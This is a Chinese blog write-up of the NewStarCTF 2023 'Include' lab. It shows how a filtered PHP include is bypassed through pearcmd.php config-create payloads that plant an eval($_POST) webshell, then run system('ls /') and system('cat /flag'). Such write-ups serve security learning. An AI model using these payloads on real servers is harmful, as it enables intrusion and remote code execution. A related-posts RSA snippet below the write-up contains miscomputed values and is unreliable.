[NewStarCTF 2023]Include--详细解析

最新推荐文章于 2025-06-23 17:06:43 发布
最新推荐文章于 2025-06-23 17:06:43 发布
阅读量1.3k 收藏 12
点赞数 20
CC 4.0 BY-SA版权
分类专栏: 文件包含漏洞 刷题记录 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56019217/article/details/143868969

信息搜集

进入靶机,界面回显代码:

 <?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?>

要我们GET传参file,且对参数的值进行了过滤。
最终执行的是include()函数。

提示我们Something in phpinfo.php!,那我们就先尝试包含这个文件看看。
在这里插入图片描述在这里插入图片描述

register_argc_argv 是开着的,可以对pearcmd.php文件进行包含利用。

文件包含

对于文件包含漏洞,我们一般先考虑使用php伪协议进行 文件的读取恶意代码的写入
但是这里过滤了filter、input、data,切断了我们使用伪协议包含的方法。

伪协议不能使用,我们又会想到利用日志文件。
通过包含日志文件的方式,将我们的恶意代码写入日志文件中并执行。
无论是Apache还是nginx,日志文件都叫做access.log,但是这里过滤了log,所有我们也不能使用包含日志文件的方法。

那么我们又会想到使用session条件竞争,这里过滤了session,也不考虑。

学习新知识点:

对pearcmd.php文件的包含利用
该文件的位置在 /usr/share/php/pearcmd.php/usr/local/lib/php/pearcmd

payload如下:

?+config-create+/&file=/usr/share/php/pearcmd.php&/<?=eval($_POST[1]);?>+/var/www/html/shell.php 
?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/shell.php

config-create是pearcmd.php的参数,用于创建默认配置文件。
这里是先包含了pearcmd.php文件,
然后将一句话木马<?=eval($_POST[1])?>写入了/var/www/html/shell.php 位置。
/usr/local/etc/php
这里我用了第二个payload,成功包含并写入shell文件,回显如下:
在这里插入图片描述然后我们访问shell.php文件,就能进行RCE了
在这里插入图片描述但是发现我们传入的一句话木马并没有被成功解析,而是被输出在了界面上。

这一步卡了好久,最后发现是要bp抓包上传
?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/shell.php
不然直接在搜索框传参,php代码中的部分符号会被url编码之后再写入shell.php文件中,就不会被当成php代码。
在这里插入图片描述

现在我们再访问shell.php文件就能正常进行RCE了。
先查目录,发现flag目录:

1=system("ls /");

在这里插入图片描述
得到flag:

1=system("cat /flag");

在这里插入图片描述

总结:

学到了文件包含的新姿势:对pearcmd.php文件的包含利用
现在的水平还不足以搞懂原理,只是能使用了,等水平高一点再尝试搞明白吧。

在搜索框传参PHP代码时,php代码的符号会被url编码,服务器收到的是编码,不会把它看作代码解析。
所以以后需要通过传参上传php代码时,使用抓包程序进行上传,防止被编码。

No Feign Client for loadBalancing defined. Did you forget to include spring-cloud-starter-loadbalanc
程序员劝退师的博客
12-08 4113
这是因为由于SpringCloud Feign在Hoxton.M2 RELEASED版本之后不再使用Ribbon而是使用spring-cloud-loadbalancer,所以不引入spring-cloud-loadbalancer会报错。Hoxton.M2 RELEASED版本后,不在使用Ribbon而是采用spring-cloud-loadbalancer,依赖关系如下。如果出现如下报错,可能是版本问题导致的,这个报错是说缺少spring-cloud-starter-loadbalancer依赖。
文件包含题(进阶)
pwfortune的博客
03-31 1480
(不是使用system("env");第三种方法是利用 PHP Base64 Filter 宽松解析 ,构造RCE, 看了好久目前还没看懂。( 成功执行, 写入命令到/tmp/shell.php ,访问这个文件进行 RCE)可以发现访问到了这个文件,然后进行POST传参 进行 RCE。用 cat 命令 随便进入到几个文件中没能发现flag ,在环境变量中,需要用到 system("env");直接包含flag.php ,即可拿到flag。(一直找到根目录也没能找到flag)
NewStarCTF 2023 第一阶段公开赛部分wp
10-02
这是官方的wp文件,需要的可以下载查看
详细讲解[NewStarCTF 2023 公开赛]R4ndom
最新发布
2401_84404094的博客
06-23 1090
刚忙完考试来更新一下。R4ndom这题也属于一个动态调试题,挺有意思的。这题涉及了不少知识点。首先是两个函数,一个是反调试,另外一个是一个初始化种子(上篇博客有提及_init_array,不过那一个是静态分析),然后(本文采用调试取)、逆怎么逆(本文采用爆破逆)此外要注意一下这是文件,是,要在Linux下跑,不能在windows下跑本篇博客和SMC都属于动态调试,感兴趣的也可以看下SMC那篇博客。
BUUCTF-NewStarCTF 2023 公开赛 WEEK2[WEB]include 0。0
qq_68581192的博客
10-14 339
发现有flag.php,且发现base等被过滤了,利用php伪协议,再通过利用iconv将utf-8编码转为utf-7编码,读取flag.php,构造payload。利用utf-7在线转换,得出flag。
[NewStarCTF 2023]include 0。0--详细解析
m0_56019217的博客
11-17 995
使用php伪协议时要考虑目标服务器是否开启了相关配置。php://filter有很多变种,目前还不是很熟悉这个伪协议,明天总结一下。
NewStarCTF2023week2-include 0。0
Welcome To Myon'Blog !
10-14 1198
构造payload:?构造payload:?因为flag在flag.php,并且这里过滤掉了base和rot,没关系我们使用其他编码方式输入输出即可。回到这题,我先尝试的是使用php://input(用于执行PHP代码)1、flag在flag.php。
NewStarCTF 2023 公开赛 Week2_newstarctf 2023 week2 pzthon(1)
2401_83947398的博客
04-18 1195
时,得到的结果只是phpinfo()这个字符串,它只是将我们构造的array_rand(array_flip(getallheaders()))给执行了而已,所以我们要先用一个eval将array_rand(array_flip(getallheaders()))变为phpinfo();如果在后面,可以用array_reverse()将数组反转过来之后,再用current拿它,它在中间就不好搞了,又不能用next套娃,因为next的参数要是数组,第一次next完成之后就不是数组了,变成字符串了。
2023NewStarCtf [WEEK2] web 方向超详细wp(题目+思路+拓展知识点)
2301_76690905的博客
10-15 1936
这里需要修改前端js文件,用变量覆盖修改gamescore的值,使得判定为大于100000分。步骤:火狐找到调试器下的js文件,在里面gamescore这一行打断点(点一下347那行的开头就行),然后点击开始游戏,游戏会在打中目标的时候停在断点处,这时候点击控制台,在里面写入gameScore=99999999999然后回车,就相当于给这里的gamescore赋值了99999999999,然后点击左上角这个运行,回到调试器把鼠标移到gamescore上面看看有没有赋值成功,然后点击运行,就能弹出flag。
tesseract-3.02.02-win32-lib-include-dirs
05-08
- 结果获取:`TessBaseAPI::GetUTF8Text()`返回识别的UTF-8编码文本,`TessBaseAPI::GetWords()`等方法则提供了更详细的结构化输出。 六、优化与提升 为了提高识别效果,开发者可以进行以下优化: 1. 前处理:对...
C++ boost::asio编程-域名解析详细介绍
12-31
C++ boost::asio编程-域名解析 在网络通信中通常我们并不直接使用IP地址,而是使用域名。这时候我们就需要用reslover类来通过域名获取IP,它可以实现 与IP版本无关的网址解析。 #include stdafx.h #include boost/...
前端开源库-markdown-it-include
08-30
Markdown-it-Include是一款针对前端开发者的开源库,它是Markdown-it解析器的一个插件。Markdown-it是一个流行的、可扩展的Markdown解析器,旨在速度与准确度之间取得平衡,同时支持多种自定义规则。Markdown-it-...
CTF-include
qq_61774705的博客
08-16 2161
ctf
NewStarCTF 2023 公开赛 Week1
Fab1an的博客
10-02 3513
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。数组为空,那么MD5加密之后都为0,那么就是相等的,满足条件,可以成功绕过。那么接下来需要绕过if(!打开之后,是一个登录界面,试一下管理员账号admin,密码123456,登录失败,那么我们抓包,然后爆破一下密码。
ctf include(文件包含漏洞)
weixin_64311421的博客
03-01 1497
不能不知ctf比赛中的文件包含漏洞的题
ctf文件包含
qq_52671379的博客
06-14 709
ctf文件包含 题目 鼓捣一下发现一个链接shell 意思是可通过ctfhub传值 看一下代码发现看到eval函数,将请求的参数作为命令执行。可是txt文件是无法利用的,所以想到刚才的index页面中,有一个include函数通过get提交,会将shell.txt的内容合并到index.php中,尝试post提交ctfhub的值,发现被执行了,然后输出了当下目录的文件。 Flag在文件file通过get传值会被include函数将文件的内容合并到index.php中 首先将文件给到shell.tet
[CTF][ACTF2020新生赛]include
凉水的博客
10-18 2930
解题思路 1 尝试 随便试了下几种目录穿越的方法,没有错误回显,没法判断是否成功。 …/…/ 以及file=xx.php等 2 换思路 简单试过后,发觉即使是目录攻击,这种无有效提示的攻击尝试方法,也是非常低效的。应该换个其它思路试一下。 翻出ctfer成长之路,这本书,看到php的漏洞利用,有filter以及zip协议等,灵机一动,考虑到php内容本身没有回显,会不会在php代码注释里,不管,先用filter试一下base64编码,试了一下,得到: ?file=php://filter/convert.b
include 0。0(NewStar 2023 week2 web)
qq_66013948的博客
11-02 206
这种题型已经做过很多次了,不过这里需要浅谈一下过滤器,在本题目中,base和rot被过滤了,并且不区分大小写,在这里,这两种过滤器就不能用了,那么,这里就可以用到。convert.iconv.*过滤器,语法为。就是编码方式,有如下几种;
ctf
handuoduo123的博客
11-02 875
ctf 啾咪 打开是一可爱的小猫咪 图片后缀为png,推测与LSB相关,用Stegsolve打开,按左右键调三原色。 ![一般情况下,将三原色都调成0,BGR排序往上拉,可以看到一段码] 将得到的码,在base64下解码 ...
[NewStarCTF 公开赛]RSA_begin
03-16
### 关于 NewStarCTF 公开赛 RSA_begin 的解题思路 #### 背景介绍 RSA 是一种基于大整数分解困难性的公钥加密算法。其核心在于通过两个大素数 \( p \) 和 \( q \),计算模数 \( n = p \times q \),并利用欧拉函数 \( \phi(n) = (p-1)(q-1) \) 来生成私钥 \( d \)[^1]。 在题目中已知参数如下: - \( p = 473398607161 \) - \( q = 4511491 \) - \( e = 17 \) 目标是求解私钥 \( d \),满足条件 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。 --- #### 计算过程详解 ##### 1. 计算模数 \( n \) 根据定义,\( n = p \times q \)。因此, \[ n = 473398607161 \times 4511491 = 2136002117282111. \] ##### 2. 计算欧拉函数 \( \phi(n) \) 由公式 \( \phi(n) = (p-1)(q-1) \),可得: \[ \phi(n) = (473398607161 - 1) \times (4511491 - 1) = 473398607160 \times 4511490 = 2135550968666920. \] ##### 3. 扩展欧几里得算法求逆元 \( d \) 为了找到 \( d \),需满足 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。这可以通过扩展欧几里得算法实现: 给定 \( a = e = 17 \), \( b = \phi(n) = 2135550968666920 \),执行扩展欧几里得算法得到 \( x \)(即 \( d \)),使得 \( ax + by = \gcd(a, b) \) 成立。 以下是 Python 实现代码: ```python def egcd(a, b): if a == 0: return (b, 0, 1) gcd, x1, y1 = egcd(b % a, a) x = y1 - (b // a) * x1 y = x1 return gcd, x, y def mod_inverse(e, phi_n): _, x, _ = egcd(e, phi_n) return x % phi_n # 已知参数 e = 17 phi_n = 2135550968666920 # 求解 d d = mod_inverse(e, phi_n) print(d) ``` 运行上述代码可以得出结果: \[ d = 125714762862169. \] --- #### 提交 Flag 最终将 \( d \) 值作为 flag 提交即可。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值